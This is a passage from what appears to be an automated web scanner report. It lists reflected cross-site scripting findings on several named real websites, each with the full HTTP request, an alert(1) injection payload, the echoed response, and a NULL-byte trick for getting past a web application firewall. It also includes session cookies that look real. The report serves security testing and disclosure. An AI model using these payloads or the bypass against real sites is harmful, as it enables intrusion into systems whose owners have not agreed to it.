Summary

Severity:	High
Confidence:	Certain
Host:	http://bing.fansnap.com
Path:	/checkout/index/418563179

Issue detail

The value of the poctx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2bd2'%3balert(1)//bac1f343622 was submitted in the poctx parameter. This input was echoed as c2bd2';alert(1)//bac1f343622 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3Bc2bd2'%3balert(1)//bac1f343622&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AzAqqNBjoLb2Zmc2V0af6QnQ%3D%3D--a2496e9fd1e9391aea4b68370610eb89644e9f7c

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 300
ETag: "5ff9664519f65b9a7781f49ed9ab43df"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4Aa%2F%2BCQBjoLb2Zmc2V0af6QnQ%3D%3D--1b66b51438b82f12b3c1ce5c5f99c1f32cece254; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11838
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
mt=int;tsp=0;dt=1;lpos=2'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;c2bd2';alert(1)//bac1f343622', afm: '' });
//]]>
...[SNIP]...

4.98. http://bing.fansnap.com/checkout/index/418563179 [quantity parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bing.fansnap.com
Path:	/checkout/index/418563179

Issue detail

The value of the quantity request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 415c6%3balert(1)//307985a8d4c was submitted in the quantity parameter. This input was echoed as 415c6;alert(1)//307985a8d4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2415c6%3balert(1)//307985a8d4c&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AzAqqNBjoLb2Zmc2V0af6QnQ%3D%3D--a2496e9fd1e9391aea4b68370610eb89644e9f7c

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 19
ETag: "ebe1f05b5ca7f470ad04bea1006a5098"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4CvyHmQBjoLb2Zmc2V0af6QnQ%3D%3D--0279fe035f67d15bb206dd13bb309897befe1c90; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11864
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<![CDATA[
CheckoutInterstitialController.initialize({fbConnect: false, skipPingout: false, ticketSetId: 418563179, quantity: 2415c6;alert(1)//307985a8d4c, ctx: escape('c=tix;mt=int;tsp=0;dt=1;lpos=2'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop
...[SNIP]...

4.99. http://bing.fansnap.com/checkout/index/418563179 [uet parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bing.fansnap.com
Path:	/checkout/index/418563179

Issue detail

The value of the uet request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45f62'%3balert(1)//460f48c4516 was submitted in the uet parameter. This input was echoed as 45f62';alert(1)//460f48c4516 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A38966945f62'%3balert(1)//460f48c4516 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AzAqqNBjoLb2Zmc2V0af6QnQ%3D%3D--a2496e9fd1e9391aea4b68370610eb89644e9f7c

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 20
ETag: "40ada9b89ee6ead16a400de8babf6823"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4B0qUCRBjoLb2Zmc2V0af6QnQ%3D%3D--6657fee0d08aa8e33f9fc98ffe6124427ec80778; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11838
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<![CDATA[
PageUet.initialize('seats-uet', '-776896836:7925:pgscheckout','','bing',{tag:'mt:int;sz:1254;id:38966945f62';alert(1)//460f48c4516'})
//]]>
...[SNIP]...

4.100. http://cdnt.meteorsolutions.com/api/track [jsonp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdnt.meteorsolutions.com
Path:	/api/track

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 6b0c8<script>alert(1)</script>acaef72a27e was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/track?application_id=081c924b-ddfd-447a-8c7a-2db01211cae7&url_fbid=nSlUkQ8r7Lb&parent_fbid=&referrer=&location=http%3A%2F%2Fwww.discoverbing.com%2F&url_tag=NOMTAG&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3B6b0c8<script>alert(1)</script>acaef72a27e HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://www.discoverbing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=85865477.1307200302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=85865477.1920090660.1307200302.1307200302.1307200302.1; meteor_server_0370d778-6d35-93f3-466c-59c57e04ef74=0370d778-6d35-93f3-466c-59c57e04ef74%3C%3EVwS8Au3voUp%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.meteorsolutions.com%2F%253Ffbid%253DVwS8Au3voUp; meteor_server_c07f795b-7582-4b81-9576-782effe57ad7=c07f795b-7582-4b81-9576-782effe57ad7%3C%3EtRxY8SXOa6F%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fsocial.discoverbing.com%2F%253Fform%253DSHOHPB%2526publ%253DBINGCOM%2526crea%253DTEXT_SHOHPB_SocialSearch_Theme04_ShopWithFrnds_1x1; meteor_server_a71be9da-385a-45ab-b672-9d67c538b004=a71be9da-385a-45ab-b672-9d67c538b004%3C%3EB5nUnLnLLMn%3C%3E9uMSzSBW7pb%3C%3E%3C%3Ehttp%253A%2F%2Faz10143.vo.msecnd.net%2Fweb%2Foie9%2Findex_tyie9A.html%2523fbid%253D9uMSzSBW7pb%2526wom%253Dfalse; uid=0ad1f409-c147-4bb9-a425-2684ee1031f7

Response

HTTP/1.1 200 OK
Server: meteor/1.0
Date: Tue, 19 Jul 2011 15:17:00 GMT
Content-Type: application/javascript
Connection: close
P3P: CP="NID DSP ALL COR"
Etag: "d00ab68f758f97563f85eeddfa221adcab3289cf"
Content-Length: 174
Set-Cookie: meteor_server_081c924b-ddfd-447a-8c7a-2db01211cae7=081c924b-ddfd-447a-8c7a-2db01211cae7%3C%3EnSlUkQ8r7Lb%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.discoverbing.com%2F; Domain=.meteorsolutions.com; expires=Wed, 18 Jul 2012 15:17:00 GMT; Path=/
Set-Cookie: uid=0ad1f409-c147-4bb9-a425-2684ee1031f7; Domain=.meteorsolutions.com; expires=Wed, 18 Jul 2012 15:17:00 GMT; Path=/

meteor.json_query_callback({"parent_id": "", "id": "nSlUkQ8r7Lb", "uid": "0ad1f409\\x2Dc147\\x2D4bb9\\x2Da425\\x2D2684ee1031f7"}, 0);6b0c8<script>alert(1)</script>acaef72a27e

4.101. http://corporate.everydayhealth.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://corporate.everydayhealth.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e12f'%3balert(1)//809941ee22b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1e12f';alert(1)//809941ee22b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?1e12f'%3balert(1)//809941ee22b=1 HTTP/1.1
Host: corporate.everydayhealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=Waterfront-media
Cookie: SL_Audience=210|Accelerated|203|1|0; __utmz=104244948.1305642699.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/30; s_vi=[CS]v1|26E943688507A615-6000010160003977[CE]; .ASPXANONYMOUS=AcxLMZLcPztjNzU4YjAwZS05NzBkLTQ1MTctYWIyNy03MWNiM2NhYTlmM2I1; __utma=104244948.1964776954.1305642699.1305642699.1305642699.1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 4766
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
Server-ID: : USNJWWEB02
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Tue, 19 Jul 2011 20:20:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<script language='javascript'>var theform = document.forms[0];theform.action = '/index.aspx?puid=EEDAA734-76F5-44E1-92C3-004E57847A78&1e12f';alert(1)//809941ee22b=1';</script>
...[SNIP]...

4.102. http://corporate.everydayhealth.com/about-eh-sites.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://corporate.everydayhealth.com
Path:	/about-eh-sites.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72398'%3balert(1)//453a224832a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72398';alert(1)//453a224832a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /about-eh-sites.aspx?72398'%3balert(1)//453a224832a=1 HTTP/1.1
Host: corporate.everydayhealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://corporate.everydayhealth.com/
Cookie: SL_Audience=210|Accelerated|203|1|0; __utmz=104244948.1305642699.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/30; s_vi=[CS]v1|26E943688507A615-6000010160003977[CE]; .ASPXANONYMOUS=Acx84xcyPgZjNzU4YjAwZS05NzBkLTQ1MTctYWIyNy03MWNiM2NhYTlmM2I1; __utma=104244948.1964776954.1305642699.1305642699.1305642699.1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9510
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
Server-ID: : USNJWWEB02
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Tue, 19 Jul 2011 20:20:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<script language='javascript'>var theform = document.forms[0];theform.action = '/index.aspx?puid=DDB9EA26-95E8-4243-A47C-5AA8728ABE46&72398';alert(1)//453a224832a=1';</script>
...[SNIP]...

4.103. http://digg.com/ajax/tooltip/submit [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/ajax/tooltip/submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003d472"><script>alert(1)</script>dd8bfeb6e79 was submitted in the REST URL parameter 1. This input was echoed as 3d472"><script>alert(1)</script>dd8bfeb6e79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /ajax%003d472"><script>alert(1)</script>dd8bfeb6e79/tooltip/submit?token=1311085708_f512e3f19fa7c46ecf738ea5b1e8e413d5d3afb12cbdfbb1323de756ece723b2 HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
